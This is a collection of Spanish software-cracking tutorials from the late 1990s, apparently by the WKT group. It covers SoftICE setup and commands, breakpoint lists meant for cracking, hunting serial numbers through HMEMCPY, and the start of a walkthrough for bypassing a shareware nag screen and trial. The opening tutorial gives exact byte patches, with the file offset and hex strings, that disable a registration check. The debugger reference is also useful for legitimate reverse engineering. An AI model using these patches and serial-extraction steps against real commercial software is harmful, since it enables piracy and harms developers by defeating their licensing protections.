ventana de mensaje del Softlce diciendo que no puede cargar la tabla de símbolos, 
pulsemos el botón SÍ y aparecemos directamente en el SoftIce con la pantalla en modo 
texto. En este momento nos encontramos en la primera sentencia de nuestro programa. 
Pulsemos bpx messagebeep con esto tomaremos el control antes de que aparezca el 
pitido. Con Ctrl-D volvemos a Windoce y el programa sigue ejecutándose normalmente 
pero con un cebo en messagebeep. Elegimos la opción de registro y escribimos cualquier 
cosa en nombre, apellidos y número de serie, pulsamos el botón y aparecemos de bruces 
en: 


USER32'MessageBeep 


/014F:BFF623C1 B148 MOV CL,48 **** Aparecemos aquí.**** 
014F:BFF623C3 EB12 JMP BFF623D7 

Si pulsamos en este momento F12(continuar hasta un RET) nos situaremos en: 
014F:0047BA65 EB11 jmp 0047BA78 

014F:0047BA67 6A30 push 00000030 

014F:0047BA69 E8S22A7F8FF Call 00406190 **** Llamada a MessageBeep**** 
014F:0047BA6E B8BCBB4700 mov eax, 0047BBBC 


014F:0047BA73 ES24BEFBFF call 0043789C **** Pintamos la ventana de error **** 
En tu ordenador las direcciones de memoria pueden ser diferentes. 


¡Sintamos el código!. Estamos en mitad de las sentencias de error, lo que implica que 
debe haber un salto condicional a este conjunto de sentencias de error. El salto debe ser 
condicional porque en caso de haber metido correctamente el número de serie 
¡habríamos obtenido algún tipo de mensaje de felicitación. Así pues, sólo debemos 
encontrar ese salto condicional y modificarlo. 


Miremos por encima de la dirección 014F:0047BA69, nos encontramos en 
014F:0047BA65 un salto incondicional jmp 0047BA78, en una ejecución normal nunca 
llegaríamos a 0047BA67 ya que siempre saltaríamos a 0047BA78. Por tanto, lo que 
debemos buscar es un salto condicional a la dirección 0047BA67. Si volvemos hacia atrás 
jun poco con los cursores encontramos este bonito salto 


014F:0047B934 ES9B73F8FF call 00402CD4 
014F:0047B939 0F8528010000 jne 0047BA67 **** ¡BINGO! +++ 
014F:0047B93F 8D45B7 lea eax, dword ptr [ebp-49] 


Hemos encontrado el salto, sólamente hay que modificarlo. Fijaos que el salto se produce 
después de una llamada a la rutina call 00402CD4 apostaría el pellejo a que esta es una 
rutina para comprobar si tu número de serie es correcto. Si no es igual (jne) salta a las 
sentencias de error. Si es igual continua ejecutándose. Hay muchas formas de invertir el 
salto: 


1.- Cambiar 0F8528010000 jne 0047BA67 por 
0F8500000000 jne 0047B93F 
2.- Cambiar 0F8528010000 ¡ne 0047BA67 por 


[404840484048 inc eax,dec eax, inc eax, dec eax, inc eax, dec eax 


La 1 es un salto neutro, sea igual o no siempre se ejecuta la sentencia siguiente. La 2 es la 
preferida por +ORC, cambia el salto por un conjunto de parejas incrementar - 
decrementar que dejan el registro eax sin cambios en su contenido. 


Solamente hay que tener en cuenta dos cosas para modificar el código, sustituir siempre 
el mismo número de bytes (cambias 2 bytes por 2 bytes) y que tus modificaciones sean 
una sentencia en ensamblador correcta. 


El Softlce nos permite hacer cambios On-Fly, es decir, en ese mismo instante, pero el 
¡cambio no es permanente. Para ello, nos vemos obligados a utilizar algún editor 
hexadecimal, con el cual abriremos el fichero ejecutable, y buscaremos la cadena en 
hexadecimal E89B73F8FF0F8528010000 y la cambiaremos por 
ES9B73F8FF0E8500000000. La cadena se encuentra en el offset 0X7AD34(los números 
en hexa llevan delante un 0X) que en decimal es 503092. 


Así pues tenemos que irnos al byte 503092 de fichero ejecutable y comenzar a hacer 
cambios. 


Ahora tendremos el ejecutable parcheado, si nos registramos nuestro número de serie 
¡siempre será aceptado. 


'Un crack no es más que un pequeño programa que abre un fichero y cambia un par de 
bytes por otros. ¡Nada más sencillo! Sólo hay que saber qué bytes hay que cambiar. 
Cuantos menos bytes se cambien más elegante será el crack. 


¡Si habéis seguido todos los pasos habéis crackeado vuestro primer programa. Aun nos 
¡sois cracker pero estáis en la buena senda. Sólo hay que poner interés. 


¡Para gentes más avezadas, comentaré que el flag de activación se iniciativa 
correctamente en :0047BA5E mov byte ptr [004CF31A],00 La rutina de protección es 
bastante patética, con gran cantidad de código inactivo. Empieza en :47B5C0. 
Obviamente se podría haber hecho algún otro tipo de pero este es el más simple (se 
podría haber obtenido el número de serie real, o haber creado un generador de 
claves).El programador ha puesta a "pelo" la dirección de retorno en :47BA3F push 
47BA54. Es un ridículo truco que nos hará perdernos si continuamos ejecutando 
¡mnormalmente, por ello es conveniente pulsar ''F12'" y mirar hacia por encima sin 
ejecutar sentencias. 


Espero vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 
¡En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +0RC en la red. 
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Instalación del Soft-Ice 3.22 para W95 


e Tener el Softlce 3.20, y la actualización a la versión 3.22 (ver sección de 
hErrAmiEntAs para conseguirlos) 


e Ejecutar el programa de instalación (3.20), y cuando lo pida, decirle que 
no actualize el Autoexec.Bat, ya que es mejor hacerlo después a mano. 
e Ejecutar el programa de actualización (3.22). 


e Editar el AutoExec.Bat, y añadir al final : 
CHOICE /T:N,3 "Cargar Debugger Soft-Ice 3.22 " 
IF ERRORLEVEL 2 GOTO SEGUIR 
CASTWOSWINICE.EXE 
¡SEGUIR 


e Al arrancar el Pc, tendremos 3 segundos para contestar si queremos cargar 
el Softlce. 
(Se puede cambiar el tiempo y/o la opción por defecto con el parámetro 
/T:OpcionDefecto,Segundos ) 
Si hemos pedido cargar el debugger, el windows arrancará normalmente, 
pero al pulsar Ctrl-D tiene que aparecer el entorno del debugger, y a partir 
de aquí ya es otra historia.... 


e Para ejecutar el Softlce desde una "ventana" de guindous, hay que activar 
la casilla de Universal Video Driver, cuando se configura la targeta 
gráfica. 

Se puede volver a reconfigurar con el "Display Adapter Setup" que se 
instala juntamente con el Softlce, y dejarlo como mejor nos vaya. 


Configuración del entorno (WinIce.Dat) 


Los parametros de configuración estan en el fichero Winlce.Dat, y se puede acceder a ellos también 
desde el pgm Symbol Loader, en la opción de SoftICE Initialization Settings. 


Algunos comandos se pueden teclear directamente desde el Softlce, o se pueden tener en el 
WinIce.Dat para que se ejecuten al arrancar. 
Probad primero, y lo que más os interese lo poneis en la linia INTT="X;" 


CODE ON : Para ver los bytes en hexa de cada instrucción asm. 
LINES %+ : Número de linias para la pantalla. 

WR : Para ver/ocultar la ventana de Registers. 

WL : Para ver/ocultar la ventana de Locals. 

WC $ : Número de linias para la ventana de Code. 

WD * : Número de linias para la ventana de Data. 

WW * : Número de linias para la ventana de Watch. 


Un ejemplo de configuración podría ser : 
INIT="CODE ON;¿LINES 60;WR;WL;WD 13;WC 25;WATCH eax;¿WATCH *eax;¿X;¿" 


Estando en el Softlce, el tamaño de las ventanas también se puede modificar con el ratón. 
Y también se pueden cambiar los colores con el comando COLOR 


Configuración del entorno (WinIce.Dat) 


Para poder interceptar llamadas a funciones externas del programa que estamos 
traceando, hay que retocar unas linias en el WinIce.Dat 

Se tienen que "exportar" los ficheros que contengan las funciones que queramos 
pillar. Los típicos que conviene tener para interceptar las llamadas al Api de 
windows son : 


EXP=c:windowsAsystemlkerne1l32.d11 
EXP=c:windows1systemluser32.d11 
EXP=c:windowsAsystemlgdi32.d11 
EXP=c:windowssystemladvapi32.d11 


Estas linias las vereis en el WinIce.Dat, pero con un puntoycoma delante que las 
inactiva. 
Tan sólo quitar el ; y retocar el path del windows si no se ajustase a vuestro Pc. 


Sin estos "Exports", no se podria poner un BreakPoint tipo BPX 
GetWindowTextA, que son muy útiles para bastantes desprotecciones. 


> y 
VO 


Traceando .... 


Tenemos varias opciones para ir avanzando por el programa : 


T (F8): Ejecuta la instrucción actual y se para en la siguiente. 
P (F10): Igual que T, pero no entra en los Call. 

P RET (F12): Ejecuta hasta una instrucción de retorno (RET). 

G address (F11): Ejecuta hasta la dirección 'address'. 


Husmeando .... 


Para poder ver o buscar lo que hay en memoria : 


D address [L length] : Muestra el contenido de la memoria. 
S address L length data-string: Busca un valor en la memoria RAM. 


Ejemplos : 

D EAX => para ver qué hay en EAX 

D *EAX => para ver qué hay en la dirección que apunta EAX 
D EBP-200 ==> para ver qué hay en EBP-200 

D 000F:A8A57 ==> para ver qué hay en la dirección F:A8A57 


S 0 L FFFFFFFF 'clave' => Busca el texto 'clave' por toda la memoria. 
S 0 L FFEFFFFFF A1,41 => Busca 'A141' en hexadecimal por toda la memoria. 
S es:di+10 L ecx A1,41 => Busca 'A141' en hexa. desde es:di+10 hasta (es:di+10)+ ecx 


- 
Vi 


El uso de los BreakPoints, o Puntos de Ruptura es muy útil para parar el programa en 
un momento dado. Ponerlos bien significa ahorrarse ver muchas linias de código 
inútil. 

Para manipular los BreakPoints tenemos : 


Parando .... 


BL : Muestra los BreakPoints que hemos puesto. 


BD % : Desactiva el BreakPoint número *+ (* para todos). 
BE % : Activa el BreakPoint número + (* para todos). 
BC %* : Elimina el BreakPoint número *+ (* para todos). 


Algunos de los BreakPoints disponibles son : 


BPX address/symbol : Parada por ejecución. 

BPIO [-h] port [R|W|RW] : Parada por acceso a puerto E/S. 
BPINT interrupt-number : Parada por interrupción. 

BMSG hWnd [L] begin-msqg : Parada por mensaje. 

BPM address : Parada por acceso a memoria. 


Para ver ejemplos y coger ideas de Puntos de Ruptura, ver el documento de 


BreakPoints. 
- 
Vi 


Pidiendo .... 


Con el Softlce disponemos de varios comandos para obtener información del Sistema. 
Por ejemplo, 


WMSG : Muestra los mensajes de windows. (wm_gettext, wm_lbuttondown,.. 


TASK : Muestra las tareas actualmente en ejecución. 
HWND nombreTask : Muestra información sobre los "windows handles". 
EXP : Muestra/Carga las funciones "exportadas" de las DLlLs. 


Supongamos que queremos interceptar qué se hace con una clave que acabamos de introducir en un 
programa. 

Se podría hacer (entre otras maneras) : 

TASK => para ver el nombre del programa. 

HWND nombrePgm => para ver que apuntadores hay para ese programa. 

BMSG apuntador mensaje ==> para poner un BreakPoint. 


Ej: interceptar para la tarea prueba32, el "Window-Handle" 2C0 (Class_Name: Edit, que corresponde al 


cuadro de texto) 
HWND prueba32 
BMSG 2C0 wm_gettext 
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WKT Tutorialz Site 
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Whiskey Kon Tekila 


Mr.Brown Resumen de los Comandos del Softlce Julio 1998 
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Comandos existentes en el SoftIce 3.22 


SETTING BREAK POINTS 


BPM, BPMB, BPMW, BPMD 
- Breakpoint on memory access 


BPR - Breakpoint on memory range 
BPIO - Breakpoint on 1/0 port access 
BPINT - Breakpoint on interrupt 

BPX - Breakpoint on execution 

BMSG - Breakpoint on Windows message 
BSTAT - Breakpoint Statistics 

CSIP - Set CS:EIP range qualifier 


MANIPULATING BREAK POINTS 


BPE - Edit breakpoint 

BPT - Use breakpoint as a template 
BL -= List current breakpoints 

BC - Clear breakpoint 

BD - Disable breakpoint 

BE - Enable breakpoint 

BH - Breakpoint history 


DISPLAY/CHANGE MEMORY 


R - Display/change register contents 
U - Un-assembles instructions 
D, DB, DW, DD, DS, DL, DT 
- Display memory 
E, EB, EW, ED, ES, EL, ET 


- Edit memory 


PEEK - Read from physical address 

POKE - Write to physical address 

PAGEIN -— Load a page into physical memory (note: not always safe) 
H - Help on the specified function 

? - Evaluate expression 

VER - SoftICE version 

WATCH -— Add watch 


FORMAT - Change format of data window 
DATA Change data window 


DISPLAY SYSTEM INFORMATION 


GDT - Display global descriptor table 

LDT - Display local descriptor table 

IDT - Display interrupt descriptor Table 
TSS - Display task state segment 

CPU - Display cpu register information 
PCI - Display PCI device information 

MOD - Display windows module list 

HEAP - Display windows global heap 

LHEAP  - Display windows local heap 

VXD - Display windows VxD map 

TASK - Display windows task list 

VCALL - Display VxD calls 

WMSG - Display windows messages 

PAGE - Display page table information 

PHYS - Display all virtual addresses for physical address 
STACK -— Display call stack 

XFRAME - Display active exception frames 
MAPV86 - Display v86 memory map 

HWND - Display window handle information 
CLASS -— Display window class information 
VM - Display virtual machine information 
THREAD - Display thread information 

ADDR - Display/change address Contexts 
MAP32 -— Display 32 bit section map 

PROC - Display process information 

QUERY -— Display a processes virtual address space map 
WHAT - Identify the type of an expression 


OBJDIR - Display info about an object directory 
DEVICE - Display info about a device 


DRIVER - Display info about a driver 
FOBJ - Display info about a file object 
IRP - Display info about a IRP 


I/O PORT COMMANDS 


1, IB, IW, ID 
- Input data from 1/0 port 
O, OB, OW, OD 
-— Output data to I/O port 


FLOW CONTROL COMMANDS 


Xx - Return to host debugger or program 

G - Go to address 

T - Single step one instruction 

P - Step skipping calls, Int, etc. 

Go to current cursor line 

EXIT - Force an exit to current DOS/Windows program 
GENINT Generate an interrupt 

HBOOT System boot (total reset) 


paa 

H 

ps) 

H 
l 


l 


MODE CONTROL 


I1HERE - Direct INT1 to SoftICE 
IBHERE - Direct INT3 to SoftICE 


ZAP - Zap embedded INT1 or INT3 
FAULTS - Enable/disable SoftICE fault trapping 
SET - Change an internal variable 


CUSTOMIZATION COMMANDS 


PAUSE - Controls display scroll mode 

ALTKEY - Set key sequence to invoke window 

FKEY - Display/set function keys 

DEX - Display/assign window data expressions 
CODE - Display instruction bytes in code window 
COLOR - Display/set screen colors 

ANSWER -— Auto-answer and redirect console to modem 
DIAL - Redirect console to modem 


SERIAL - Redirect console 


TABS - Set/display tab settings 

LINES -— Set/display number of lines on screen 
WIDTH - Set/display number of columns on screen 
PRN - Set printer output port 

PRINT-SCREEN key - Dump screen to printer 

MACRO - Define a named macro command 


UTILITY COMMANDS 


A - Assemble code 

S - Search for data 

F - Fill memory with data 
M - Move data 

E - Compare two data blocks 


LINE EDITOR KEY USAGE 


(Up) -= Recall previous command line 
(Down) -— Recall next command line 
(Right)- Move cursor right 

(Left) - Move cursor left 


BKSP - Back over last character 


HOME 
END 
INS 
DEL 
ESC 


Start of line 

- End of line 

- Toggle insert mode 

- Delete character 

- Cancel current command 


SCROLLING KEY USAGE 


PageUp - Display previous page of display history 
PageDn - Display next page of display history 
A1t- (Up) = Scroll data window down one line 
Alt-(Down) - Scroll data window up one line 
Alt-PageUp - Scroll data window down one page 
Alt-PageDn - Scroll data window up one page 
Ctrl-PageUp - Scroll code window down one page 
Ctrl-PageDn - Scroll code window up one page 

Ctr1- (Up) -= Scroll code window down one line 


Ctrl1- (Down) 


Scroll code window up one line 


WINDOW COMMANDS 


- Toggle code window 

- Toggle data window 

- Toggle floating point stack window 
- Toggle locals window 

- Toggle register window 

- Toggle watch window 

- Enable/disable code window 

- Locate current instruction 


WINDOW CONTROL 


RS 
ALTSCR 
FLASH 


- Clear window 

-— Restore program screen 

- Change to alternate display 
Restore screen during P and T 


SYMBOL/SOURCE COMMANDS 


SYM 
SYMLOC 
EXP 
SRC 
TABLE 
FILE 
SS 
TYPES 
LOCALS 


- Display symbols 

- Relocate symbol base 

- Display export symbols 

- Toggle between source, mixed € code 

- Select/remove symbol table 

- Change/display current source file 

- Search source module for string 

-= List all types, or display type definition 
- Display locals currently in scope 


BACK TRACE COMMANDS 


SHOW 
TRACE 


- Display from backtrace buffer 
- Enter back trace simulation mode 


XT - Step in trace simulation mode 


XP - Program step in trace simulation mode 
XG - Go to address in trace simulation mode 
XRSET -— Reset back trace history buffer 


SPECIAL OPERATORS 


- Preceding a decimal number specifies a line number 


S - Preceding an address specifies SEGMENT addressing 
$ - Preceding an address specifies SELECTOR addressing 
Q - Preceding an address specifies indirection 

Went 
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Introducción 


Una de las habilidades más importantes para desproteger un programa es saber 
Dónde, Cuándo y Qué Tipo de BreakPoints usar. 

En caso contrario, acabas perdido entre cientos de lineas de código, sin poder 
encontrar la rutina de protección buscada. 


Las posibilidades de BreakPoints son infinitas, pero hay algunos que se usan 
frecuentemente para las desprotecciones. 


Tener en cuenta si el programa debugado es de 16 o 32 bits para los Puntos de 
Ruptura en las llamadas al Api de windows. 

Por ejemplo, BPX GetWindowText (para 16 bits) y BPX GetWindowTextA (para 
32 bits). 

O sea, que los programas para W95 de 32 bits llevan la A al final. 


> 
Wer 


Ejemplos de BreakPoints útiles para el cracking 


1)General Purposes 
BPX messagebox 

BPX getdlgitemtext 
BPX getwindowtext 
BPX hmemcpy 

BPX showwindow 

BPX updatewindow 
BMSG XXXX wm_gettext 
BMSG XXXX wm_command 
BMSG XXXX wm_move 


2) Time Related 

BPINT 21 if ah==2A (DOS) 
BPX getlocaltime 

BPX getfiletime 

BPX getsystemtim 


3)Register Flag Related (e.g. Flag on EAX) 


BPX cs:eip if EAX==0 (SICE 3.x) 


4) Memory Flag Related (e.g. Flag on 0030:000045AA) 


BPMB cs:eip rw if 0x30:0x45AA==0 (SICE 3.x) 


5) "Hear The Echo" Technique Related 


BPX 0x30:0x45AA do "d 0x30:0x44BB" (SICE 3.x) 
BPX CS:0x66CC do "? EAX" (SICE 3.x) 


6) CD-ROM and Disk Based Schemes 


BPINT 13 if ah==2 (DOS) 
BPINT 13 if ah==3 (DOS) 
BPINT 13 if ah==4 (DOS) 


BPX GetFileAttributesA 

BPX GetFileSize 

BPX GetDriveType 

BPX GetLastError 

BPX ReadFile 

BPIO -h (Your CD-ROM Port Address) R 


7)Dongle Cracking 
BPIO -h 278 R 
BPIO -h 378 R 


BPINT 21 if ah==3dh (DOS) 
BPINT 31 if ah==3fh (DOS) 


BPINT 21 if ah==3dh (DOS) 
BPX ReadFileA 
BPX CreaterFileA 


9)Keyboard Input Related 


BPINT 16 if ah==0 (DOS) 
BPINT 21 if ah==0xA (DOS) 


Nota: Texto original en inglés de Aesculapius 
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1- ¿Que es HIMEMCPY? 


HMEMCPY es una API de Windows, que utiliza la memoria RAM para leer, manipular, comparar y 
almacenar cadenas (texto que introducimos cuando un programa nos pide el numero de serie por 
ejemplo). La funcion recoge la informacion que le proporcionamos y la carga en memoria. Despues 
manipula esas cadenas, las mueve y las compara (por ejemplo compara tu numero de serie con el 
correcto), y despues decide si la cadena es o no la correcta. 

La funcion HMEMCPY devuelve esta informacion al programa en cuestion, y si has puesto el serial 
correcto te lo aceptara o de lo contrario te mostrara una bonita ventana de error. 


2- ¿Para que nos sirve a los Crackers HIMEMCPY? 


HMEMCPY se puede utilizar para "cazar" numeros de serie validos en programas shareware. 
Utilizando un debugger (depurador) como el Softlce, podemos poner un breakpoint en HMEMCPY 
para que el programa se pare y nos avise cuando llama a la funcion. Muchos programas shareware 
utilizan HMEMCPY para comparar numeros de serie, sobre todo cuando han sido escritos en Delphi o 
en Visual Basic. 


3- ¿Como preparar el Softlce para pararnos en HMEMCPY? 


Cargamos nuestra "victima" y vamos a la ventana de registro, donde normalmente se nos pedira un 
nombre y un numero de serie. Suele haber un boton que se debe pulsar para validar los datos una vez 
introducidos. Pues bien, si existe el boton procedemos de la siguiente forma: 


Rellenamos los datos, nombre y serial cualquiera. Vamos al Softlce y ponemos un breakpoint en 
HMEMCPY, para lo cual escribimos " BPX HMEMCPY ". Lo que estamos haciendo es indicarle al 
Softlce que se pare y nos avise cuando nuestra "victima" llame a HAMEMCPY. 


Una vez puesto el breakpoint, pulsamos Ctrl+d para volver al programa. Pulsamos el boton de registro 
y volveremos al Softlce. Bien, ahora si suponemos que los datos que nos pedian solo eran dos, el 
nombre y el numero de serie..... necesitamos pulsar una vez Ctrl+D (o F11, es lo mismo) puesto que si 
no lo hacemos estaremos siguiendole la pista al nombre y no es lo que nos interesa. :0) 


Si no existe el boton de registro: 
Ponemos el BPX antes de introducir el ULTIMO caracter de nuestro serial falso. 


Ahora si que estamos en el camino correcto (bueno, casi). Si te fijas, en el Softlce veras una linea 
encima de la ventana de comandos que pone el nombre del programa en el que estas. En nuestro caso 
lo usual sera que veas algo como: "USER(0A)" o "(USER(01)" pues esta parte no nos interesa para 
nada, tenemos que llegar al codigo de nuestra "victima". Para lo cual pulsamos F12 unas cuantas veces 
hasta que veamos el nombre de nuestro programa en cuestion, lo cual nos indicara que estamos dentro. 
Si por ejemplo el programa se llama "victima" veremos algo como "VICTIMA!CODE". 


4- ¿Que podemos buscar? 


Una vez que estamos dentro del codigo de nuestra "victima", tenemos que buscar una comparacion 
(CMP, TEST) y/o un salto condicional (JE, JNE, JZ, JNZ...etc). Si encuentras una comparacion y 
despues un salto, lo mas probable es que sea una zona muy muy interesante. 


Un ejemplo: 

CALL XXXXXXXX 

MOV EAX, [EBP-14] ¡EAX contiene el serial que introducimos 
MOV EDX, [00463A56] ¡EDX contiene el serial CORRECTO 

CALL XXXXXXXX ¿Llamada a una rutina para compararlos 
JNZ 0047FCA4 ¿Si es correcto salta a REGISTRADO (si no es cero) 
MOV EAX,00466F34 ¿Si es cero no estamos registrados 

CALL XXXXXXXXX 

JMP 0047FCCC 

MOV EAX, 004738D4 

MOV EDX,00466F7C 

CALL XXXXXXXX 


Esta rutina es bastante tipica, aunque obviamente hay muchas variantes. :0) 

Para "cazar" nuestro serial en este ejemplo, necesitamos situarnos sobre la linea "MOV EDX,[00463A56]" , ahora 
vamos a ver que diablos contiene el registro EDX para lo cual escribimos en el Softlce "D EDX". NUESTRO SERIAL 
CORRECTO !!! 


Otra rutina bastante comun seria algo similar a esto: 


PUSH EAX 

CALL XXXXXXXX ¡Llamada a una funcion que calcula nuestro serial Correcto 
ADD ESP, 04 ¿y lo almacena en memoria 

TEST EAX, EAX ¿Compara nuestro serial con el Correcto 

JNZ 00440994 ¡Si no es cero salta a REGISTRADO 


PUSH 
PUSH 
PUSH 
CALL 


0047B52B ¡Nuestro serial Correcto 
64 

EBX 

XXXXXXXX 


Los registros y las posiciones de memoria que tu te vas a encontrar seran diferentes , pero la rutina sera bastante 
parecida. Para ver nuestro numero de serie valido nos situamos en la linea del PUSH 0047B52B y escribimos en el 
Softlce "d 0047B52B" 

Para terminar nada mejor que practicar con la obra maestra de algun programador desinformado. (Se nota que pocos 
programadores leen nuestros tutoriales jejeje, en fin, peor para ellos, el que no aprende es porque no quiere). 


Como obtener un Serial Valido para Talisman v1.1 


====== kk PERSONAL GREETZ 4 *-========¿4% 


Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 

JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 


* * 


|WHISKEY KON TEKILA| 
|Mr.WhiTe [WkT!99] | 
|http://wkt.tsx.org| 
|[http://ecd.tsx.org| 


* * 
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Introducción 


Quién no haya intentado crackear este clásico, o alguna de sus versiones predecesoras, que me 
tire la primera piedra... 


Todos hemos oído hablar del Cuentapasos que, a pesar de existir otros programas equivalentes 
de distribución gratuita, sigue siendo una codiciada presa. Nos encontramos ante una 
aplicación escrita en Visual Basic, en la que el autor ha intentado protegerla por todos lados, 
tapando entradas y huecos, cerrándonos puertas de formas más o menos inteligentes. Y 
sabemos que cuanto más interés pone el autor en proteger una aplicación, más interesante hace 
a la presa, desde el punto de vista didáctico que es el que nos mueve a los miembros de WKT!. 


Sirva el presente tutorial para demostrar la gran dificultad que supone para cualquier 
programador realizar una protección eficiente de sus aplicaciones cuando estas están escritas en 
Visual Basic. La nueva forma de compilación en p-code no hace más que facilitar las cosas a 
los amantes de la ingeniería inversa. De hecho, durante el tutorial se mostrará que desproteger 
un programa de Visual Basic p-compilado es mucho más sencillo e inmediato que el mismo 
compilado en código nativo. 


Aprenderemos, además de cómo pelearnos con éxito contra el p-code, otras técnicas exóticas. 
Reconozco que podría haberse hecho de otra forma menos elaborada, pero nuestra meta no es 
crackear; es aprender, enseñar y mostrar nuevas técnicas crackeando. 


Reconocimiento y exploración 


Veamos a que nos enfrentamos. Al ejecutar el programa, nos aparece una pantalla de 
bienvenida, en la que posteriormente aparece que es una versión de evaluación. Sobre esta 
pantalla aparece otra que nos muestra los datos de la aplicación, dirección de correo electrónico 
del autor, etc... También aparece un código de compra, tanto en el título como en el botón de la 
derecha. 


Lo que nos interesa es que aparecen los días transcurridos del periodo de evaluación y los días 
que nos restan que no es más que treinta menos los días transcurridos. Además aparecen dos 
botones, Aceptar y Salir. Estos serán nuestros enemigos, la nag-screen y las rutinas que 
calculan los días restantes de evaluación. Nuestros objetivos serán que el usuario no se vea 
obligado a pulsar Aceptar para arrancar la aplicación (es irritante) y por supuesto, "ampliar" el 
periodo de evaluación (que alguien puede pensar que es insuficiente). 


Es una buena costumbre, para empezar a tomar contacto con el programa, y sobre todo en esta 
fase inicial en la que tenemos que planear nuestra estrategia, pasar a la víctima por un detector 
de formatos como el GetTyp. La salida del GetTyp nos muestra que el ejecutable se encuentra 
comprimido. Más explicaciones en el tutorial de Mr.Orange sobre descompresión manual con 
ProcDump. Al encontrarse comprimido, no podremos realizar un parcheador que actúe sobre el 
fichero en disco, tendremos que descomprimirlo previamente. 


El ratón virtual 


Para saltar la nagscreen vamos a utilizar un método clásico, que muchos pueden desconocer. 
Vamos a simular un click del ratón sobre el botón Aceptar, sin intervención del usuario. Es un 
método en desuso pero elegante y limpio, que nos permite comprender un poco mejor el 
funcionamiento del Windows y aprender muchas cosas, que es para lo que estamos aquí. 


¿Cómo se hace? Lo primero que debemos hacer es obtener el identificador del proceso del cual 
queremos depende el botón que queremos pulsar. Esto puede hacerse de dos maneras, o 
ejecutamos nosotros el proceso vícitma mediante CreateProcess o nos enganchamos al proceso 
que ya está en ejecución. Lógicamente, lo que a nosotros nos interesa es lo primero, para lo que 
crearemos un cargador del programa que será el que cargue a la aplicación víctima, esperará a 
que se cargue y buscará una referencia o handle de la ventana en la que se encuentra el botón 
que queremos pulsar. Después, buscaremos en esa ventana el botón que nos interesa y 
finalmente simularemos un click sobre él. 


Para buscar la ventana se utiliza la función EnumThreadWindows. Esta función sirve para 
enumerar todas las ventanas padre asociadas al thread que le pasamos como parámetro. Para 
ello, utiliza una función de tipo Callback que no es más que una función escrita por nosotros, 
que es ejecutada por EnumThreadWindows cada vez que encuentra una ventana. 
EnumThreadWindows le pasa a nuestra función de Callback el puntero a la ventana que ha 
encontrado.Nuestra función , a su salida, devolverá un booleano: False si ya se ha encontrado la 
ventana o True en caso contrario. EnumThreadWindows no devolverá el control a nuestro 


cargador hasta que la función de Callback haya devuelto un False o bien se hayan enumerado 
ya todas las ventanas. 


¿Y cómo sabemos si una ventana es la que buscamos o no? Para eso, nuestra función de 
Callback puede utilizar varias funciones: 


e GetClassName. Devuleve el nombre de la clase de la ventana que le pasamos como 
parámetro. 

e GetWindowText. Devuelve el texto o título de la ventana. 

e GetWindowRect. Devuelve las coordenadas de la esquina superior izquierda y esquina 
inferior derecha de la ventana. 


Una vez que hayamos encontrado la ventana que contiene el botón que queremos pulsar, 
debemos encontrar un puntero a este botón. En este caso, la función es EnumChildWindows, a la 
que le pasamos el puntero a una ventana padre, y nos enumera todas la ventanas hijas de ella 
(botones, cuadros de texto,...). Su funcionamiento es idéntico al de EnumThread Windows. 


Ya tenemos el botón, ahora, a pulsarlo. Esto se realiza mediante PostMessage, que manda a la 
ventana que queramos, el mensaje que queramos. En este caso, enviaremos a un botón el 
mensaje BM_CLICK, que simula pulsar y soltar el botón del ratón. 


Más información y ejemplos sobre este tema en las páginas de Fravia, en la sección '+HCU's 
Papers": Simulating User Input to Eliminate Nag Screens por bb. 


¡ Atrapen a ese botón ! ¡ Atrapenlo ! 


Botones al borde de un ataque de nervios 


Antes de nada tenemos que recabar información sobre el botón que queremos "pulsar". 
Volvemos a arrancar el Cuentapasos pero dejamos sin pulsar el botón Aceptar. Arrancamos el 
Spy++ (o similar) para que nos muestre los parámetros de los componentes de la nagscreen, en 
especial los nombres de clase de los objetos de interes, el texto que aparece y las coordenadas. 
Pulsamos en la opción 'Find' (Alt+FF3) y pasamos el punto de mira por todos los componentes de 
Interés. 


Por si no os habeis dado cuenta todavía, de ejecución en ejecución, los botones Aceptar y Salir 
se intercambian de manera aleatoria. Así, el autor evita una de las posibles formas de 
distinguirlos, mediante su situación en pantalla que nos da la función GetWindowkRect. 


Tanto la nagscreen como la ventana de presentación son de la clase ThunderRT5Form, para 
poderlas distinguir nos tendremos que fijar en el título, ya que la pantalla de presentación no 
tiene título y la nagscreen tiene '"Versión de Evaluación P...'. Por lo que parece, no vamos a 
tener problemas para encontrar la ventana padre de nuestro botón. 


Vamos a los botones. Podemos olvidarnos del botón ''Comprar «Programa P...”, ya que es 
facilmente identificable por tamaño, situación y texto. Tanto el botón Aceptar como Salir, 
tienen exactamente el mismo tamaño, evitando así el autor del programa que podamos 
distinguirlos mediante la función GetWindowRect que también permite conocer el tamaño de 
una ventana. Los dos son de la clase ThunderRT5CommandButton (tampoco podremos 
distinguirlos por el nombre de la clase), y el texto... oh, oh. Ninguno de los dos tienen texto, así 
que tampoco nos sirve GetWindowText. Y algunos se preguntarán, "Entonces ¿Aceptar y Salir 
qué son?" Pues está claro, si no son cadenas de texto serán ... imágenes. Para probarlo, cambiad 
el color de las ventanas de Windows y veréis que, aunque el botón cambia de color, las palabras 
Aceptar y Salir están enmarcadas por el fondo gris que trae por defecto el Windows. Como 
podeis ver, el autor ha obrado inteligentemente y se ha informado convenientemente sobre 
técnicas de ingeniería inversa (a lo mejor hasta nos lee a nosotros). 


Bien, no nos pongamos nerviosos. Tenemos dos botones que al parecer, cambian de sitio de 
manera aleatoria pero ... el orden de creación de los botones siempre será el mismo, 
independientemente de donde se situen. Si excarvamos más profundamente en la ayuda de la 
APT nos encontramos la función GetNextWindow, que dado el puntero a una ventana hija, nos 
da el puntero a la ventana hija siguiente o a la posterior. Ya tan solo queda por descubrir que 
posición ocupa el botón Aceptar en el orden de creación. De hecho, la función 
EnumChildWindows enumera las ventanas hijas en el orden de creación, bastaría con coger, por 
ejemplo, la cuarta ventana que nos enumere suponiendo que el botón Aceptar sea la cuarta. 


Bueno, vamos a ver. Volvemos al Spy++ con esperanzas renovadas y pulsamos las propiedades 
del botón Aceptar de la nagscreen. En mi caso es el botón de la izquierda y es el último que 
